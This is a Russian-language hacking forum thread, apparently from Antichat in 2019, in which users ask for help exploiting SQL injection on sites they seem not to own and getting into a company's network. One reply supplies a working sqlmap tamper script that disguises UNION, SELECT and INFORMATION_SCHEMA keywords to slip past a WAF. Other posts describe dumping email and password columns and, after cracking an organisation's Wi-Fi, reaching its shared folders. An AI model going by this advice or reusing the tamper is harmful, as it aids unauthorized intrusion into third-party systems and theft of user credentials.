HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2641  
Старый 02.08.2019, 13:18
BenderMR
Guest
Сообщений: n/a
Провел на форуме:
22457

Репутация: 10
По умолчанию

Есть интересный скуль, но когда пробую вытянуть таблицы выдается ошибка, что у юзера бд нет прав:

Код:
Code:
SELECT command denied to user 'user'@'localhost' for table 'tables'
Кто то сталкивался с таким? Eсть ли какие то варианты продвинуться дальше?
 
Ответить с цитированием

  #2642  
Старый 05.08.2019, 19:36
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Чеп прикрыть USB технике что в офисе, не разбирая, не испортив?
 
Ответить с цитированием

  #2643  
Старый 06.08.2019, 00:06
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Где найти нормальной информации про защиту инфы в компаний?
 
Ответить с цитированием

  #2644  
Старый 06.08.2019, 01:40
RWD
Guest
Сообщений: n/a
Провел на форуме:
56255

Репутация: 2
По умолчанию

Цитата:
Сообщение от Octavian  
Octavian said:

Где найти нормальной информации про защиту инфы в компаний?
пообщаться с опытным CISO большой компании.

на линкедине полно контактов.
 
Ответить с цитированием

  #2645  
Старый 07.08.2019, 13:01
AngelEyes
Guest
Сообщений: n/a
Провел на форуме:
1924

Репутация: 0
По умолчанию

Подскажи плз тампер для обхода этого ваф WAF/IPS identified as 'ASP.NET RequestValidationMode (Microsoft)

а то при сливе выдает:

| Email | LoginPassword |

+-------+---------------+

| NULL | NULL |

| NULL | NULL |

| NULL | NULL |

| NULL | NULL |

| NULL | NULL |

| NULL | NULL |

| NULL | NULL |

| NULL | NULL |

скажи,что может мешать WAF.Буду благодарен и за другие советы по этой проблемке

P.S новичок в этом,если не затруднит,то можно развернутый ответ для "особо одаренных" =))
 
Ответить с цитированием

  #2646  
Старый 07.08.2019, 14:47
karkajoi
Guest
Сообщений: n/a
Провел на форуме:
96779

Репутация: 5
По умолчанию

Цитата:
Сообщение от AngelEyes  
AngelEyes said:

Подскажи плз тампер для обхода этого ваф WAF/IPS identified as 'ASP.NET RequestValidationMode (Microsoft)
а то при сливе выдает:
| Email | LoginPassword |
+-------+---------------+
| NULL | NULL |
| NULL | NULL |
| NULL | NULL |
| NULL | NULL |
| NULL | NULL |
| NULL | NULL |
| NULL | NULL |
| NULL | NULL |
скажи,что может мешать WAF.Буду благодарен и за другие советы по этой проблемке
P.S новичок в этом,если не затруднит,то можно развернутый ответ для "особо одаренных" =))
Руками надо смотреть на что ругается ВАФ и потом уже искать обход.

Почитай и попробуй варианты

https://hydrasky.com/network-securit...ss-cheatsheet/

http://www.securityidiots.com/Web-Pe...de-part-1.html

https://medium.com/@drag0n/sqlmap-ta...s-c5a3f5764cb3
 
Ответить с цитированием

  #2647  
Старый 11.08.2019, 08:54
highmoore
Guest
Сообщений: n/a
Провел на форуме:
4388

Репутация: 0
По умолчанию

Прошу помощи в раскрутке скули

Что есть? Сайт написанный на Coldfusion, юнион и булеан типы, скуля в гет параметре

Кручу мапом, мап видит булеан, через ордер бай понимает что есть и юнион, видит что там 3 колонки и натыкается на ваф

Ругается на слово union, select пропускает

Мап не может определить даже тип субд из-за того что ваф не пропускает его дальше

Ошибка вафа :

You are not permitted to run URL SQL Statements on this server. Your IP address has been logged and e-mailed to our administrator.

Пробовал юрл энкод, двойной юрл энкод, почти все тамперы которые хоть как-то могли помочь
 
Ответить с цитированием

  #2648  
Старый 11.08.2019, 13:54
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от highmoore  
highmoore said:

Прошу помощи в раскрутке скули
Что есть? Сайт написанный на Coldfusion, юнион и булеан типы, скуля в гет параметре
Кручу мапом, мап видит булеан, через ордер бай понимает что есть и юнион, видит что там 3 колонки и натыкается на ваф
Ругается на слово union, select пропускает
Мап не может определить даже тип субд из-за того что ваф не пропускает его дальше
Ошибка вафа :
You are not permitted to run URL SQL Statements on this server. Your IP address has been logged and e-mailed to our administrator.

Пробовал юрл энкод, двойной юрл энкод, почти все тамперы которые хоть как-то могли помочь

Пробуй обойти ваф руками, потом пиши свой тампер на этот ваф, вот как пример

.SpoilerTarget" type="button">Spoiler
#!/usr/bin/env python

"""

Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)

See the file 'doc/COPYING' for copying permission

"""

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGHEST

def dependencies():

pass

def tamper(payload, **kwargs):

"""

........

"""

if payload:

payload = payload.replace("INFORMATION_SCHEMA.TABLES", "/*!12345%49NFORMATION_SCHEMA.TABLES*/")

payload = payload.replace("table_schema", "/*!12345%74able_schema*/")

payload = payload.replace("table_name", "/*!12345%74able_name*/")

payload = payload.replace("UNION", "/*!12345%75NION*/")

payload = payload.replace("SELECT", "/*!12345%73ELECT*/")

payload = payload.replace("SCHEMA", "%73CHEMA")

payload = payload.replace("schema", "%73chema")

payload = payload.replace("from", "/*!12345from*/")

return payload
дальше кладешь в папочку tamper/my_tamper.py и вызываешь --tamper="my_tamper"
 
Ответить с цитированием

  #2649  
Старый 12.08.2019, 03:32
highmoore
Guest
Сообщений: n/a
Провел на форуме:
4388

Репутация: 0
По умолчанию

Цитата:
Сообщение от winstrool  
winstrool said:

Пробуй обойти ваф руками, потом пиши свой тампер на этот ваф, вот как пример
Spoiler
#!/usr/bin/env python
"""
Copyright (c) 2006-2017 sqlmap developers (
http://sqlmap.org/
)
See the file 'doc/COPYING' for copying permission
"""
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.HIGHEST
def dependencies():
pass
def tamper(payload, **kwargs):
"""
........
"""
if payload:
payload = payload.replace("INFORMATION_SCHEMA.TABLES", "/*!12345%49NFORMATION_SCHEMA.TABLES*/")
payload = payload.replace("table_schema", "/*!12345%74able_schema*/")
payload = payload.replace("table_name", "/*!12345%74able_name*/")
payload = payload.replace("UNION", "/*!12345%75NION*/")
payload = payload.replace("SELECT", "/*!12345%73ELECT*/")
payload = payload.replace("SCHEMA", "%73CHEMA")
payload = payload.replace("schema", "%73chema")
payload = payload.replace("from", "/*!12345from*/")
return payload
дальше кладешь в папочку tamper/my_tamper.py и вызываешь --tamper="my_tamper"
Да, это все я понимаю, дело в том, что я руками не могу, все варианты провалились, это MSSQL как оказалось

С которым у меня не так много опыта, буду благодарен за любую помощь
 
Ответить с цитированием

  #2650  
Старый 12.08.2019, 18:05
SovaGSN
Guest
Сообщений: n/a
Провел на форуме:
21715

Репутация: 0
По умолчанию

Всем доброго вечера! Подскажите, подобрал пароль к wi-fi роутеру организации, видно локальную сеть из 5 устройств и одного принтера. Компы на винде 7. Есть ли возможность проникнуть в расшаренные папки? ибо при попытке захода на удаленный комп внутри ЛВС требуется пароль и логин. Пароль требует только к компу админа, а остальные компы видны только как медиапроигрыватели
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ